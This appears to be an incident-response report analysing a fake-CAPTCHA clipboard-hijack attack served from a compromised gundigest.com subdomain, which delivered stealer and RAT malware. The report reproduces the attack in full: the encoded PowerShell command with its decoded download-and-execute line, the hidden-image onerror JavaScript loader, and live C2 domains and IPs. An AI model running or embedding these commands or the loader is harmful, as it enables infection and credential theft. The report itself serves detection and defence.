Gun Digest Website Compromise Investigation Report
Executive Summary
I investigated a sophisticated web-based compromise affecting the gunvalues.gundigest.com
subdomain after a CrowdStrike Falcon alert on one of our Windows endpoints (VictimHost
) under the user account CompanyDomain\UserA
. By combining Falcon endpoint telemetry with independent analysis in my own lab, I was able to reconstruct the entire attack chain — from the compromised website, through its cloaking mechanisms, to the PowerShell payload and the downstream command-and-control (C2) infrastructure.
Key Findings I Confirmed
- The
gunvalues.gundigest.com
subdomain is serving malicious JavaScript - Attackers use cloaking and profiling to selectively deliver payloads
- The attack chain leads to clipboard hijacking and PowerShell execution
- Infrastructure was newly registered and active at the time of investigation
- Dynamic analysis revealed multi-family malware (stealer, RAT, loader)
Attack Overview
Aspect | Details |
---|---|
Attack Vector | A fake CAPTCHA page (captcha.php ) hijacks the clipboard and tricks users into executing a malicious PowerShell command |
Target Profile | Victims are normal visitors to gundigest.com |
Attack Timeline | Sept 8, 2025: taurinolands.top registeredSept 10, 2025: Falcon blocked PowerShell execution on VictimHost Sept 10, 2025: I reproduced the attack chain in my lab |
Endpoint Evidence (Falcon)
On VictimHost
, Falcon showed this process chain:
explorer.exe → conhost.exe → cmd.exe /c powershell ...
The command line contained an encoded PowerShell payload:
cmd /c powershell /ep bypass /e RwBlAHQALQBIAGUAbABwADsASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAKABJAG4AdgBvAGsAZQAtAFIAZQBzAHQATQBlAHQAaABvAGQAIAAnAGgAdAB0AHAAcwA6AC8ALwB0AGkAbgB5AHUAcgBsAC4AYwBvAG0ALwBtAHQAcgBjAGsAdAB4AG0AJwApAA== /W 1
When I decoded this Base64, I got:
Invoke-Expression (Invoke-RestMethod 'https://tinyurl.com/mtrcktxm')
That TinyURL redirects to taurinolands.top
.
My Independent Web Analysis
1. Capturing captcha.php
When I fetched https://gunvalues.gundigest.com/captcha.php
, the HTML included a hidden <img>
element:
<img src="/files/img/logo.png"
data-digest="...Base64..."
onerror="(new Function(atob(this.dataset.digest)))();"
style="visibility: hidden;">
I decoded the data-digest
value and found JavaScript that dynamically injects a <script>
tag pointing to ajax.php
. This only runs if the image load fails — an evasion trick.
2. Triggering ajax.php
By blocking logo.png
in DevTools, the loader fired and requested ajax.php
. The response was a small script (~378 B). That suggested I was being filtered.
I then tried POSTing fingerprint data manually to ajax.php
with curl. The server responded with JSON like:
{
"js": false,
"target": "",
"ok": false,
"action": "noop",
"cid": "95cbb9026b6e4ef8c2bd381307626c6b"
}
Each attempt gave me a new campaign/client ID (cid
). This showed me the infrastructure was live and performing victim profiling.
3. Redirect chain
When I checked the TinyURL from the Falcon PowerShell command:
curl -I "https://tinyurl.com/mtrcktxm"
I saw a 301 redirect to:
https://taurinolands.top/web/store/articles
That endpoint returned 204 No Content
, consistent with filtering.
Sandbox Analysis (ANY.RUN)
To see the second stage, I executed the Falcon PowerShell payload in ANY.RUN. This revealed:
Malware families:
- Rhadamanthys Stealer
- Arechclient2 RAT
- HijackLoader
Additional infrastructure:
lnwagensaabstake.top
lvkyrrwjvpbrzdlhr.ce
144.172.108.216
(ports 9000, 443, PONYNET hosting)
Artifacts:
- Executable drops (e.g.,
ElevateExp.exe
) - Edge browser data manipulation
Network patterns:
- Connections to multiple redundant C2s
- GET requests like
/wbinjget?q=<victimID>
Indicators of Compromise (IOCs)
Web Infrastructure
gunvalues.gundigest.com/captcha.php
gunvalues.gundigest.com/ajax.php
Redirect Infrastructure
tinyurl.com/mtrcktxm
taurinolands.top/web/store/articles
C2 Infrastructure
212.11.64.164
lnwagensaabstake.top
lvkyrrwjvpbrzdlhr.ce
144.172.108.216
Payload Hashes
PowerShell payload (Base64 encoded):
RwBlAHQALQBIAGUAbABwADsASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBu...
Final payload (ANY.RUN):
SHA256: D4C9D9027326271A89CE51FCAF328ED673F17BE33469FF979E8AB8DD501E664F
Impact Assessment
Confirmed impact: VictimHost
executed a PowerShell payload from Gundigest → TinyURL → taurinolands. Falcon blocked further execution.
Potential impact:
- Credential theft (browser, Office, crypto)
- Persistence
- Remote access
- Lateral movement
Organizational risk: Medium-high, since this was a compromise via a trusted site and involved professional-grade evasion.
Recommendations
Immediate Actions
- Block IOCs (domains, IPs, hashes)
- Hunt environment-wide for similar PowerShell execution chains
- Add detections for clipboard hijack patterns
Strategic Actions
- Improve browser security controls
- Train users about clipboard hijacking attacks
- Monitor for newly registered .top and similar domains
Conclusion
Through Falcon detection, my own lab work, and sandbox analysis, I reconstructed the entire attack chain:
Any.Run Report
Gun Digest has been notified.
Prepared by: [Jase Jourdain]
Date: September 10, 2025
Tags: #incident-response #malware-analysis #powershell